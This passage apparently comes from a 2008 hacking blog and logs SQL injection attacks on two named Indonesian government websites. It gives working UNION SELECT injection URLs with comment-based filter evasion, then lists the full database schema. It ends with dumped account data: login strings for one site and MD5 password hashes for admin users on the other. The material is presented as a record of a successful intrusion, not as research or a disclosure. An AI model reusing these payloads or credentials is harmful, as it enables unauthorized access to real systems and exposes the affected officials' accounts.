[49]tblweblayoutposisifile: tblweblayoutposisifile_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutposisifile_namafile,tblpengguna_id
[50]tblweblayoutposisifileprogram: tblweblayoutposisifile_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutposisifile_namafile,tblpengguna_id
[51]tblweblayoutposisifilepustaka: tblweblayoutposisifile_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutposisifile_namafile,tblpengguna_id
[52]tblweblayoutposisifiletemplate: tblweblayoutposisifile_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutposisifile_namafile,tblpengguna_id
[53]userlevelpermissions: userlevelid,tablename,permission
[54]userlevels: userlevelid,userlevelname

[-] [13:34:57]
[-] Total URL Requests 338
[-] Done


[+] URL:http://www.gunungkidulkab.go.id/home.php?mode=content&id=177+AND+1=2+UNION+SELECT+0,1,2,3,4,sqli,6,7,8,9,10,11,12,13--
[+] Evasion Used: "+" "--"
[+] 13:43:41
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dbportalgunungkidul
User: gunungkidulkab.g@localhost
Version: 5.0.38-Ubuntu_0ubuntu1-log
[+] Dumping data from database "dbportalgunungkidul" Table "tblpengguna"
[+] Column(s) ['tblpengguna_login', 'tblpengguna_pass']
[+] Number of Rows: 3

[0] adminsetmodule:1nk0mgkmodule:
[1] adminentrydata:1nk0mgkdata:
[2] Data Umum:1nk0mgkdatum:1nk0mgkdatum:

[-] [13:43:59]
[-] Total URL Requests 5
[-] Done

Monday, November 10, 2008

[SQLi] http://www.sulut.go.id

5:23 PM Posted by viperfx07 2 comments
Problem: Admin directory found, but it's forbidden...
Admin dir: http://www.sulut.go.id/admin/
Dump:
[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 16:48:27
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Showing all databases current user has access too!
[+] Number of Databases: 2

[0]sulut
[1]test

[-] [16:48:42]
[-] Total URL Requests 4
[-] Done

[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 16:48:58
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Showing Tables & Columns from database "sulut"
[+] Number of Tables: 81

[Database]: sulut
[Table: Columns]
[0]arsip: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[1]artikel: berita_id,tanggal,judul,isi,foto,penulis,alamat,email,klik
[2]bapedal: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[3]berita: berita_id,tanggal,judul,topik,isi,penulis,klik,ses
[4]bkkbn: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[5]cuaca: cuaca_id,imageCuaca,iklim,kelembaman
[6]data_instansi: dataID,kodeInstansi,tahunData,judulData,isiData
[7]diklat: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[8]diknas: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[9]dipenda: utamaID,kodeUtama,nomorUtama,judulUtama,uraianUtama,gambarUtama
[10]direktori: direktoriID,kodeInfo,juduldirektori,namadirektori,urldirektori
[11]diskom: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[12]distamben: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[13]dprd: dprdID,kodeJabatan,nomorJabatan,nama,namaJabatan,asaldprd
[14]dy_agenda: id,thn,bln,tgl,nama,keterangan
[15]dy_config: Name,Value
[16]dy_content: id,name,vname,description,text,date,auth,publish,access,position,ordered
[17]dy_content_c: id,name,vname,description,text,date,auth,publish,access,ordered,content_id
[18]dy_gbook: id,name,email,location,url,comments,date,status,iplog
[19]dy_links: name,url
[20]dy_module: Name,VName,Vimg,Access,status,staff,ordered
[21]dy_photo: id,photo,width,height,size,deskripsi,auth,date,fname,kategori,STATUS
[22]dy_photo_category: id,cname,name,access,status,type
[23]dy_photo_comment: id,pid,date,status,name,address,email,url,text,vemail,vurl,iplog
[24]dy_section: Name,VName,Vimg,Access,status,staff,ordered
[25]dy_sms: id,name,email,lokasi,msg,date,aktif
[26]dy_sosok: id,date,nama,text,photo,auth,aktif,hit
[27]dy_user: id,username,fullname,password,mode,modeDesc,telp,mobile,lastlogin,ustaff,email,status,ukey
[28]dy_user_pm: id,sender,to_user,subject,text,status,date
[29]dy_usermode: Mode,modeDesc
[30]dy_userstaff: id,Name
[31]fotosulut: pictureID,kodePicture,judulPicture,linkPicture,namaPicture,uraianPicture,titlePicture,descPicture
[32]infoumum: infoumumID,priorNumber,kodeInfo,judulInfoumum,titleInfoumum,namaInfoumum,alamatInfoumum,telponInfoumum,faxInfoumum,mailInfoumum,urlInfoumum
[33]infrastruktur: infraID,kodeInfra,judulInfra,uraianInfra,titleInfra,descInfra,gambarInfra
[34]instansi: instansiID,nomorID,kodeInstansi,namaPejabat,nipInstansi,pktInstansi,lahirInstansi,fotoPejabat,alamatInstansi,telponInstansi,faxInstansi,mailInstansi,urlInstansi,visiInstansi,misiInstansi,tupokInstansi,fungsiInstansi
[35]jajak: id,topik,pil1,pil2,pil3,vote1,vote2,vote3
[36]kehutanan: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[37]kesbang: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[38]kesehatan: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[39]kesos: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[40]koperasi: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[41]kurs: kursID,nomorKurs,uraianKurs,jualKurs,beliKurs
[42]menu_direktori: infoID,kode,uraianInfo
[43]menu_dprd: dprdID,kodeDprd,uraianDprd
[44]menu_fraksi: dprdID,kodeDprd,uraianDprd
[45]menu_galeri: galeriID,uraianGaleri
[46]menu_infoumum: infoID,kode,uraianInfo
[47]menu_infrastruktur: infraID,kodeInfra,uraianInfra
[48]menu_instansi: instansiID,kodeInstansi,uraianInstansi
[49]menu_pejabat: pejabatID,kodePejabat,uraianPejabat
[50]menu_pemerintahan: pemerintahanID,kodeMenu,uraianPemerintahan
[51]menu_perisinan: infoID,kode,uraianInfo
[52]menu_riwayat: riwayatID,kodeRiwayat,uraianRiwayat
[53]menu_sekilas: sekilasID,kodeSekilas,uraianSekilas
[54]menu_sektor: sektorID,kodeSektor,uraianSektor
[55]menu_tahun: infoID,kode,uraianInfo
[56]nama_instansi: namaID,kodeInstansi,kodenama,namaInstansi,alamatInstansi,telponInstansi,urlInstansi
[57]objekwisata: wisataID,kodeWisata,judulWisata,uraianWisata,gambarWisata,titleWisata,descWisata
[58]pariwisata: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[59]pejabat: pejabatID,kodeUnit,namaPejabat,nipPejabat,pktPejabat,lahirPejabat,fotoPejabat,urlPejabat
[60]peluang_investasi: investasiID,judulInvestasi,isiInvestasi,sumberInvestasi,klikInvestasi,titleInvestasi,descInvestasi
[61]pemerintahan: pemerintahanID,kodePemerintahan,judulPemerintahan,uraianPemerintahan,titlePemerintahan,descPemerintahan
[62]penduduk: pendudukID,tahunPenduduk,kabkotaPenduduk,lakiPenduduk,perempuanPenduduk,coba
[63]peraturan: perisinanID,perisinanIDkode,perisinanNomor,tahun,perisinanTopik,perisinanFile,perisinanContent
[64]perhubungan: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[65]pmd: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[66]potensi_investasi: potensiID,kodeSektor,komoditasPotensi,kapasitasPotensi,investasiPotensi,lokasiPotensi,ketPotensi
[67]potensikecamatan: potensiID,kdKabupaten,kdKecamatan,judulPotensi,uraianPotensi
[68]praskim: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[69]program: program_id,judul,isi
[70]riwayat: riwayatID,kodeUnit,kodeRiwayat,tahunRiwayat,uraianRiwayat
[71]sekilas: sekilasID,judulSekilas,uraianSekilas,titleSekilas,descSekilas,foto
[72]statistik: statistikID,sektorStatistik,tahunStatistik,judulStatistik,fileStatistik
[73]sumber: sumber_id,kode,topik
[74]test: field1,field2,field3,field4,field5
[75]topik: topikID,kriteria,namaTopik
[76]tupoksi: tupoksiID,kodeInstansi,visiInstansi,misiInstansi,tupokInstansi,fungsiInstansi
[77]user_admin: userID,userGroupID,userUserName,userPassword,userName,userEmail,userDesc
[78]user_group: userGroupID,userGroupName,userGroupDesc
[79]user_sulut: userID,userGroupID,userUserName,userPassword,userName,userEmail,userDesc

[-] [17:13:55]
[-] Total URL Requests 458
[-] Done


[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 17:16:41
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Dumping data from database "sulut" Table "dy_user"
[+] Column(s) ['username', 'password', 'email']
[+] Number of Rows: 4


[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 17:17:07
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Dumping data from database "sulut" Table "dy_user"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 4

[0] admin:7d4aff1e876d0d969e2dd3083c344faa
[1] vendhy:610b8251af8ae12ad9d1a4508b243fa6
[2] psit02:82027888c5bb8fc395411cb6804a066c
[3] psit07:e1c91b6b6117f93c1c8734a22acffc2d

[-] [17:17:21]
[-] Total URL Requests 6
[-] Done


[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 17:19:57
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Dumping data from database "sulut" Table "user_admin"
[+] Column(s) ['userUserName', 'userPassword']
[+] Number of Rows: 2

[0] glory:4f35ffc581dfecea4db9e25f27d17cd9
[1] kpsit:f8aa5e424bf3e7c8e3e400c906b10465

[-] [17:20:08]
[-] Total URL Requests 4
[-] Done